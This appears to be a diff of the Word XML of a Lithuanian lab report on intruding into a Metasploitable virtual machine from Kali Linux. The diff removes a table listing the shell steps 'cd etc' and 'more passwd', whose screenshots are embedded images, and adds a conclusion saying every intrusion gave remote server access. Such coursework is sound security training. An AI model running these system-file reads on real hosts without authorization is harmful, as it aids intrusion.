-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="327"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>cd etc</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53640684" wp14:editId="3F5AC84D">
-                  <wp:extent cx="2571750" cy="314325"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-                  <wp:docPr id="48" name="Picture 48"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId54"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="2571750" cy="314325"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="2177"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>more passwd</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E81BE25" wp14:editId="12686883">
-                  <wp:extent cx="3937000" cy="549275"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
-                  <wp:docPr id="49" name="Picture 49"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId55"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3937000" cy="549275"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2EE81C" wp14:editId="118B4C72">
-                  <wp:extent cx="2990850" cy="819150"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="52" name="Picture 52"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId56"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
                             <a:ext cx="2990850" cy="819150"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
@@ -14517,93 +12788,34 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Pateiktus laboratorinio darbo įsilaužimus pavyko atkartoti be komplikacijų. Darbo metu buvo naudojamos dvi virtualios mašinos: „Kali linux“ ir „Metasploit“. Pirmoji virtualioji mašina buvo naudojamas kaip įrankis įsilaužti į antrtają virtualią mašiną.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Taip pat buvo pastebėta kad yra ne veinas būdas, kaip galima įsilaužti į kitą sistemą, jeigu turi reikiamus duomenis apie sistemą. Atlikus pateiktus įsilaužimus į sistemą, visi įsilaužimai privedė prie serverio nuotolinės prieigos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(įkelti darbalaukio nuotraukas su root teisėmis ir aprašyti pažeidžiamumą, kaip jos buvo gautos)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="769"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="769"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="769"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="even" r:id="rId57"/>
-      <w:footerReference w:type="default" r:id="rId58"/>
+      <w:footerReference w:type="even" r:id="rId46"/>
+      <w:footerReference w:type="default" r:id="rId47"/>
       <w:pgSz w:w="11900" w:h="16840"/>
       <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -15956,8 +14168,8 @@
   <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B203177"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="AC3E7274"/>
-    <w:lvl w:ilvl="0" w:tplc="0409000F">
+    <w:tmpl w:val="458A536E"/>
+    <w:lvl w:ilvl="0" w:tplc="000C484C">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -15965,6 +14177,9 @@
       <w:pPr>
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
+      <w:rPr>
+        <w:color w:val="auto"/>
+      </w:rPr>
     </w:lvl>
     <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
       <w:start w:val="1"/>
@@ -16449,55 +14664,55 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="15280201">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="2" w16cid:durableId="375395912">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="3" w16cid:durableId="203640177">
     <w:abstractNumId w:val="15"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="4" w16cid:durableId="1547185268">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="5" w16cid:durableId="1380982619">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="6">
+  <w:num w:numId="6" w16cid:durableId="172847181">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="7">
+  <w:num w:numId="7" w16cid:durableId="1512909472">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="8">
+  <w:num w:numId="8" w16cid:durableId="1601599413">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="9">
+  <w:num w:numId="9" w16cid:durableId="711227726">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="10">
+  <w:num w:numId="10" w16cid:durableId="1577131342">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="11">
+  <w:num w:numId="11" w16cid:durableId="1645086855">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="12">
+  <w:num w:numId="12" w16cid:durableId="987631440">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="13">
+  <w:num w:numId="13" w16cid:durableId="1519125348">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="14">
+  <w:num w:numId="14" w16cid:durableId="1551839161">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="15">
+  <w:num w:numId="15" w16cid:durableId="1218467532">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="16">
+  <w:num w:numId="16" w16cid:durableId="123083297">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="17">
+  <w:num w:numId="17" w16cid:durableId="582180194">
     <w:abstractNumId w:val="16"/>
   </w:num>
 </w:numbering>
